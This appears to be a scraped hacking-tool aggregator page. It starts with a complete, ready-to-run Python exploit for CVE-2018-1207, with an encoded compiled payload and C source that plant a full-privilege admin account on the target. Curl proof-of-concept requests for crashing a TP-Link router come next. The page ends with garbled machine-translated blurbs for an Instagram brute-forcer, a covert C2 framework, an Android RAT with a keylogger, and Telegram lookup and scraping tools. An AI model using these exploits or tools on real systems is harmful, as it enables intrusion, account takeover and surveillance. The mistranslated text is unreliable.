AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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'
#> For the source code of this pre-compiled C code, see below

## Main program
class CustomHTTPAdapter(requests.adapters.HTTPAdapter):
    def init_poolmanager(self, *args, **kwargs):
        context = requests.ssl.create_default_context()
        context.set_ciphers('ALL:@SECLEVEL=0')
        context.check_hostname = False
        context.minimum_version = requests.ssl.TLSVersion.SSLv3
        super().init_poolmanager(*args, **kwargs, ssl_context=context)

def callURL(sURL, oSession, bData=None, lstProxies={}, boolVerbose=False):
    try:
        if bData: oResponse = oSession.post(sURL, data=bData, proxies=lstProxies, verify=False) ## Removed timeout here, as it may take a long time to upload files
        else: oResponse = oSession.get(sURL, proxies=lstProxies, verify=False, timeout = iTimeout)
    except: oResponse = None
    return oResponse

def checkVuln(sIP, oSession, lstProxies={}, boolVerbose=False):
    oResponse = callURL(f'https://{sIP}/cgi-bin/login?LD_DEBUG=files', oSession, lstProxies = lstProxies)
    if not oResponse is None and 'calling init: /lib/' in oResponse.text: 
        if boolVerbose:
            print('[*] Data returned: ')
            print(oResponse.text)
        return True
    return False

def uploadAndRunLibrary(bData, oSession, sIP, lstProxies, boolVerbose=False):
    iFFLAGS = 1
    bFAlias = b'RACPKSSHAUTHKEY1'
    bLib = bFAlias + (32 - len(bFAlias))*b'\0'
    bLib += struct.pack('<L', len(bData))
    bLib += struct.pack('<L', iFFLAGS)
    bLib += bData

    oResp = callURL(f'https://{sIP}/cgi-bin/putfile', oSession, bLib, lstProxies, boolVerbose)
    if not oResp is None and oResp.status_code == 200: 
        print('[+] File upload successful, giving the system 5 seconds before execution')
        for i in range(5,0,-1): 
            print(i, end='\r')
            time.sleep(1)
    else: 
        print('[-] Error uploading a file, maybe timeout issue, exiting now')
        exit()
    
    oResp = callURL(f'https://{sIP}/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', oSession, None, lstProxies, boolVerbose)
    if not oResp is None and oResp.status_code == 200: 
        if boolVerbose: print('[+] Response on executing the library: \n{}'.format(oResp.text))
    else: 
        print('[-] Error executing the library, maybe timeout issue, exiting now')
        exit()
    return True

def main():
    sUsage = (
    'usage: %prog [options] IP/FQDN \n'
    'Example: CVE-2018-1207.py 192.168.0.100\n\n'
    'This script verifies CVE-2018-1207 and then configures/overwrites an admin user with ID 13\n'
    'Built-in creds: username \'user\' and password \'Passw0rd\''
    )

    parser = optparse.OptionParser(usage=sUsage)
    parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')
    parser.add_option('--verbose', '-v', dest='verbose', help='Optional: be verbose, default False', action='store_true', default = False)

    (options, args) = parser.parse_args()
    if len(args) == 0: exit(sUsage)
    sIP = args[0]
    oSession  = requests.Session()
    oSession.mount('https://', CustomHTTPAdapter())
    if options.proxy: lstProxies = {'https':options.proxy}
    else: lstProxies={}
    
    print('[+] Checking if https://{} is vulnerable'.format(sIP))
    if checkVuln(sIP, oSession, lstProxies, options.verbose):
        print('[+] Success, target seems vulnerable')
        input('[?] Proceed to exploit and overwrite user ID 13? Press enter to continue or Ctrl+C to cancel now')

    print('[+] Okay, uploading the pre-compiled file now, this might take a while: ')
    if uploadAndRunLibrary(base64.b64decode(sPayloadCode), oSession, sIP, lstProxies, options.verbose): print('[+] Succesfully started the reconfiguration of user ID 13')
    print('\n[+] All done, please allow 5 to 10 minutes for file execution and then\n     open a browser to https://{} and log in (user / Passw0rd)\n     or retrieve some hashes via the CLI tool racadm'.format(sIP))

if __name__ == '__main__':
    main()

'''
[adduser.c]
#include <unistd.h>
#include <stdio.h>

static void main(void) __attribute__((constructor));
static void main(void) 
{
	int pid1 = fork();
    if(!pid1) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminUserName", "user", (char*) NULL);
	}
	int pid2 = fork();
    if(!pid2) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPassword", "Passw0rd", (char*) NULL);
	}
	int pid3 = fork();
    if(!pid3) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPrivilege", "0x000001ff", (char*) NULL);
	}
	int pid4 = fork();
    if(!pid4) {
		execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminEnable", "1", (char*) NULL);
	}
	// Note: it takes 5 to 10 minutes before these 4 commands are executed
}
// Install "gcc-10-sh4-linux-gnu" (or replace gcc-10 with gcc-11 or newer) and compile the code like this:
//  sh4-linux-gnu-gcc-10 -shared -fPIC adduser.c -o adduser.so
'''
HireHackking 
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342


Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.

Proof of Concept 1 (Missing Parameters DoS):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'

Proof of Concept 2 (Memory Corruption):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
     -H "Content-Type: text/xml" \
     -H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
     -d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
    </u:SetConnectionType>
  </s:Body>
</s:Envelope>'
HireHackking

该项目是使用Wappalyzer扩展名(及其指纹)来检测技术的命令行工具和Python库。官方开源项目停产后出现的其他项目正在使用过时的指纹,并且在动态Web应用程序上使用时缺乏准确性,该项目绕过了这些限制。

安装

在安装Wappalyzer之前,您将安装firefox和geckodriver/releases'geckodriver。以下是用于设置Geckodriver的详细步骤,但您可以使用Google/YouTube进行帮助。

设置壁虎

步骤1:下载geckodriver

访问github:的官方壁虎版本页

https://github.com/mozilla/geckodriver/Releases下载与您的System:兼容Windows: geckodriver-vx.xx.xx.x-win64.zip for Macos3: geckodriver-vx.xx.xmacos.xmacos.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar.tar3360 geckodriver-vx.xx.x-linux64.tar.gz将下载的文件提取到您选择的文件夹。

步骤2:将geckodriver添加到系统路径

要确保硒可以找到geckodriver overutable: -windows: 1。将geckodriver.exe移动到目录(例如,c: \ web drivers \)。 2。将此目录添加到系统的路径:-开放环境变量。 - 在系统变量下,查找并选择“路径变量”,然后单击“编辑”。 - 单击新的,然后输入存储geckodriver.exe的目录路径。 - 单击确定以保存。 -MacOS/Linux: 1。将geckodriver文件移至/usr/local/bin/或路径中的其他目录。 2。在终端:中使用以下命令,bash sudo mv geckodriver/usr/local/bin/suars/usr/usr/local/bin/在您的路径中。

以命令行工具安装

PIPX安装Wappalyzer

以库

安装

将其用作库,将其与pip一起安装在隔离容器中,例如。 Venv或Docker。您也可以- 进行“常规”安装,但不建议进行“常规”安装。

使用Docker

安装

步骤

克隆repository: git克隆https://github.com/s0md3v/wappalyzer-next.git

CD Wappalyzer -Next -next构建和运行Docker Compose: Docker使用Docker Container :组成-D扫描URL

扫描单个URL:

Docker Compose Run -RM Wappalyzer -I https://Example.com扫描File: Docker Compose Run的多个URL -RM Wappalyzer -I https://Example.com -oj output.json :01

用户

下面给出了一些常见的用法示例,请参阅下面的一些常见用法,请参阅所有选项的列表。

扫描单个URL: Wappalyzer -I https://Example.com扫描来自File: Wappalyzer -i urls.txt -t 10扫描的多个URL,使用身份验证: wappalyzer -I 3https://Example.com -c c.com -c sessigniD=ABC123; token=xyz789'导出结果json: wappalyzer -i https://Example.com -oj results.json

选项

Note:用于准确性使用“完整”扫描类型(默认)。 “快速”和“平衡”不使用浏览器仿真。

-i:输入URL或包含URL的文件(每行) - 扫描型:扫描类型(Default:'full')fast: fast:基于http的快速扫描(发送1个请求)balanced:基于http并发线程(Default: 5)-OJ: JSON输出文件路径-OC: CSV输出文件路径-OH: HTML输出文件路径-C,-Cookie: cookie themer tear验证的Scans scans scans scans

用于开发人员

同一姓名与Python library a -Python libly a -py at py at pycy and pypipi and pypipi and pypipi and pypipi and pypipi。

使用库

您将与IS Analyze():互动的主要功能

来自Wappalyzer进口分析

#基本用法

结果=分析('https://example.com')

#带有选项

结果=分析(

url='https://example.com',

scan_type='full',#'fast',“ balanced”或“ full”

线程=3,

cookie='sessionid=abc123'

analyze()函数参数

URL(str):分析scan_type(str,可选)的URL :类型的扫描类型,以执行“快速':基于http http的快速扫描'balanced': http scan,其基于http的scan具有更多的javas offer': execan,包括javasction(包括javas)可选):并行处理的线程数(Default: 3)cookie(str,可选): cookie标头字符串,用于身份验证的扫描

返回值

返回带有URL的字典作为键,并检测到的技术为value 3:

{

'https://github.com': {

'Amazon S3': {'version':'','profelse': 100,'categories': ['cdn'],'groups': ['server']},

'lit-html': {'version':'1.1.2','profesteR': 100,'categories': ['javascript libraries'],'groups': ['Web Development'},

'react Router': {'version':'6','profesteR': 100,'categories': ['javascript Frameworks'],'groups': ['Web Development'},},

'https://google.com': {},

'https://Example.com': {},

}}

常见问题

为什么要使用Firefox代替Chrome?

Firefox扩展名为.xpi文件,它们本质上是zip文件。这使得更容易提取数据并稍微修改扩展程序以使该工具起作用。

“快速”,“平衡”和“完整”扫描类型有什么区别?

FAST:向URL发送一个HTTP请求。不使用扩展名。 Balanced:将其他HTTP请求发送到.js文件, /robots.txt annd做DNS查询。不使用扩展名。 Full:使用官方Wappalyzer扩展程序在无头浏览器中扫描URL。

HireHackking

Bellingcat电报电话检查器的增强版本!

Python脚本使用电话号码或用户名检查电报帐户。

功能

检查单个或多个电话号码和用户名从文本文件自动下载配置文件导入数字图片将结果保存为JSON安全凭证存储详细的用户信息

安装

克隆repository: Git Clone 3https://Github.com/unnohhohwn/telegram-checkecker.git.

CD Telegram-checker安装所需软件包: PIP install -R Euncess.txt

要求

要求的内容.txt:

电视

富有的

点击

python-dotenv或单独安装包裹:

PIP安装Telethon Rich Click Python -Dotenv

fighturation

首次运行脚本时,您需要: -Telegram API凭据(从3https://my.telegram.telegram.org/apps获取) - 您的Telegram电话号码,包括CountryCode + - 验证代码(发送给您的电视台)

用法

运行脚本:

python telegram_checker.py从options : 1。从输入2中检查电话号码。从文件3中检查电话号码。从输入4中检查用户名。从文件5中检查用户名。清除保存的凭据6。退出。退出

输出

结果保存在: -Results/ - 带有详细信息的JSON文件-Profile_photos/ - 下载的个人资料图片

note

此工具仅用于教育目的。请尊重电报的服务条款和用户隐私。

许可证

MIT许可证

HireHackking

Instagram蛮力CPU/GPU支持2024

(在运行脚本时使用选项2。)

(选项1正在开发)

(镀铬应在设备中下载。)

兼容和测试(仅GUI支持操作系统)

Python 3.13 x64位unix/linix/Mac/Windows 8.1及更高

安装要求

pip install -r unigess.txt如何运行

python3 instagram_brute_force.py [instagram_username_without_hashtag]

python3 instagram_brute_force.py mrx161

HireHackking

Torward是基于Torghost-gn和Darktor脚本的改进版本,旨在增强Internet上的匿名性。该工具可防止数据泄漏,并迫使我们的计算机所有流量仅通过TOR网络路由,从而在我们的连接中提供了高度的隐私。

安装

GIT克隆https://GITHUB.COM/chundefined/torward.git cd tor tor tor chmod +x install.shard.sh ./install.sh.sh

安全增强

此版本包括几个关键的安全性改进,以保护您的身份并确保更好的网络配置33336603333660

IPv6泄漏预防IPv6现在被禁用,以防止任何潜在的IP泄漏。所有流量都通过TOR网络强迫,通过修改network_config.py中的系统IPv6设置。

增强的iPtables规则严格的iPtables规则将实施,以确保仅允许使用TOR流量。非托管流量被阻止,DNS查询通过TOR路由,并且仅允许与TOR端口的基本连接。此外,IPv6流量被阻止以防止泄漏。

TOR配置调整TORWARD文件已更新,以强制执行所有流量,包括DNS查询,通过TOR路由,以改善匿名性。

todo

获取当前最后一个Tor Exit Node3360的IP,该脚本未显示控制台中最后一个Tor Exit节点的IP。这可以通过使用Tor的API获取出口节点的公共IP来实现。更好的错误处理:确保该工具正确处理错误,例如TOR断开或网络问题。

HireHackking

AVvXsEh_ohjhHZj-D717QpTx2k7BTqUi6ci1FilF

QuickResponsec2是一个隐秘的命令和控制(C2)框架,可以通过中间HTTP/S服务器间接和覆盖攻击者和受害者机器之间的通信。所有网络活动都仅限于上传和下载图像,这使其成为IPS/IDS系统无法完全检测到的,并且是安全研究和渗透测试的理想工具。

功能:

命令执行通过QR cod:

用户可以将自定义命令发送到被编码为QR码的受害机器。

受害者扫描QR码,该QR码会触发该命令在其系统上的执行。

该命令可以是根据测试方案的简单查询到复杂操作的任何内容。

结果检索:

执行命令的结果将从受害者系统返回并编码为QR码。

服务器解码结果,并向攻击者提供反馈,以进行进一步的分析或后续操作。

内置的HTTP Server:

该工具包括一台轻巧的HTTP服务器,可帮助受害机器的命令QR码检索。

结果将作为QR代码图像发送回服务器,并且它们会自动保存使用唯一的文件名,以方便管理。

攻击者的机器处理了多个请求,并分别组织了HTTP日志并保存。

隐形通信:

QuickResponsec2在雷达下运行,具有最小的痕迹,提供了一种与受害者机器互动的封面,而无需提醒安全防御。

无需检测到的安全评估或测试命令和控制方法的理想选择。

文件处理:

该工具使用command0.png,command1.png等的顺序文件名将所有QR码(命令和结果)自动保存到Server_Files目录中。

结果文件的解码和处理无缝处理。

用户友好的接口:

该工具是通过简单的命令行接口操作的,允许用户轻松设置C2服务器,发送命令并轻松接收结果。

不需要其他复杂的配置或依赖项。

用法

首先,安装依赖项-PIP3 install -r sumpliont.txt然后,运行main.py python3 main.py在optsept : 1-运行C2服务器

2-建造受害者植入物

享受!

演示

https://github.com/user-attachments/assets/382E9350-D650-44E5-B8EF-B8EF-B43EC90B315D

工作流程概述

1。 C2服务器的初始化

攻击者启动了QuickResponsec2,该攻击者创建了轻质的HTTP服务器(默认端口: 8080)。该服务器用作攻击者和受害者之间的中间人,消除了它们之间的任何直接连接。

2。 通过QR码传递命令

攻击者将命令编码为QR代码,并将其保存为HTTP服务器上的commandx.png。受害者机器会定期对服务器进行轮询(例如每1秒)检查是否存在新的命令文件。

3。 受害者命令执行

受害者检测到新的QR代码文件(commandx.png),它将下载并解码图像以检索命令。解码命令在受害者的系统上执行。

4。 结果编码和上传

受害者将执行命令的输出编码为QR码,并将其保存为Resultex.png。然后将结果文件上传到HTTP服务器。

5。 攻击者的结果

攻击者会定期检查服务器中是否有新的结果文件(resultx.png)。找到结果文件后,下载并解码以检索执行命令的输出。AVvXsEiDmbJ3nMQ5XnaZdC3xyCGwYrmMczRAhB1Y

托多贡献

[x]生成一个植入物[]的模板[]将植入物编译为.exe自动[x]将生成的QR代码作为bytes作为变量而不是文件- 受害者端[]在QR代码解码的命令上添加一个观察值,自动觉得自己自动觉得fork and fork和贡献!欢迎拉动请求。

HireHackking

一个功能强大的Python脚本,可让您使用Telethon库从电报频道刮擦消息和媒体。功能包括实时连续刮擦,媒体下载和数据导出功能。

________________________________

\ ____/_____///_____//

| |/\ ___ \ _____ \ \

| | \ \ _ \ \ \/\

| _____ | \ _____ /_______//

\/\/

功能

从多个电报频道下载媒体文件(照片,文档)实时连续刮口到JSON和CSV格式SQLITE数据库存储功能(保存进度)媒体重新定位以进行媒体的下载,以跟踪交互式菜单3010-110,

Python 3.7或更高的Telegram帐户API凭据

先决条件

PIP install -R Euncess.txt要求的内容.txt:

电视

aiohttp

asyncio

需要Python软件包

Visit https://my.telegram.org/auth Log in with your phone number Click on 'API development tools' Fill in the form: App title: Your app name Short name: Your app short name Platform: Can be left as 'Desktop' Description: Brief description of your app Click 'Create application' You'll receive: API_ID: A数字API_HASH:一串字母和数字确保这些凭据安全,您需要它们运行脚本!

010-110克隆repository: git克隆https://github.com/unnohwn/telegram-scraper.git

CD Telegram-Scraper安装需求: PIP install -r Euncess.txt运行脚本: Python Teletram-scraper.py在第一次运行时,您会提示您进入:您的API ID您的API ID您的API HASH您的API HASH您的电话号码(带有乡村代码)您的电话号码(带有乡村代码)或BOT,但在提示次数时使用电话号码。验证代码(发送到您的电报)

获取电报API凭据

首次刮擦频道时,请注意:

该脚本将尝试检索整个频道历史记录,从最初的最初刮擦开始可能需要几分钟甚至几个小时,具体取决于:频道中的消息总数,无论是否启用媒体下载是否能够下载媒体的大小和媒体文件的大小和数量您的互联网连接速度限制脚本限制脚本的脚本使用脚本的脚本限制了PAIGINATION pAINAINS PAIGINATION pAGINATION和VAIN STACTED STACTER STRACTER STRACTER STRACTIND IT STRACTIND IT SCRIENS IT SCRAITIND IT STREACTIND IT依次进行,因此该状态的范围是在其上的差异。数据库被刮擦,因此您甚至可以在刮擦完成之前开始分析可用数据

设置和运行

脚本提供了一个交互式菜单,其中包含以下选项:

[A] Add new channel Enter the channel ID or channelname [R] Remove channel Remove a channel from scraping list [S] Scrape all channels One-time scraping of all configured channels [M] Toggle media scraping Enable/disable downloading of media files [C] Continuous scraping Real-time monitoring of channels for new messages [E] Export data Export to JSON and CSV formats [V] View saved channels List all saved channels [L] List帐户频道列出了带有ID:的所有频道,用于帐户[q]退出

初始刮擦行为

您可以使用3:-频道用户名(例如,频道名称) - 频道ID(例如-1001234567890)

用法

通道ID

数据存储在sqlite数据库中,一个每个通道: -location: -location:/channelname/channelname/channelname.db -table:消息-ID: telegram ID -first_name:发件人的名字- last_name:发件人的姓氏-username:发件人的用户名-Message:消息文本-iedia_type:媒体类型的类型

数据存储

媒体文件存储在: -location:/channelname/media/-文件使用消息ID或原始文件名命名

数据库结构

数据可以以两种格式导出:1。csv3:/channelname/channelname.csv-人类- 可读的电子表格格式- 易于导入到Excel/Google中

JSON:/channelname/channelname.json Structured data format Ideal for programming processing

媒体存储

导出数据

The continuous scraping feature ([C] option) allows you to: - Monitor channels in real-time - Automatically download new messages - Download media as it's posted - Run indefinitely until interrupted (Ctrl+C) - Maintains state between runs

详细功能

脚本可以下载:-照片- 文档- 电报支持的其他媒体类型- 自动检索失败下载- 跳过现有文件以避免重复

连续刮擦

脚本包括:-失败媒体下载的自动重试机制- 在中断的情况下,状态保存- 洪水控制合规性- 错误记录失败操作的错误记录

媒体处理

尊重电报的费率限制只能访问公共频道或频道您是媒体下载尺寸限制的成员,根据电报的限制

错误处理

贡献!请随时提交拉动请求。

限制

此项目是根据MIT许可证获得许可的- 有关详细信息,请参见许可证文件。

贡献🤝

此工具仅用于教育目的。确保TO :-尊重Telegram的服务条款- 在刮擦之前获得必要的权限- 在负责和道德上使用- 符合数据保护法规

HireHackking

AVvXsEg0Wzg4xVMQoaWUsIppkPSqxYt_ZNtYdyWV

Android的远程管理工具

功能

权限旁路(下面的Android 12)3https://youtube.com/shorts/w8h0lkfxb0 keylogger 3https://youtube.com/shorts/shorts/shorts/ll9dnrkjfoa

安装

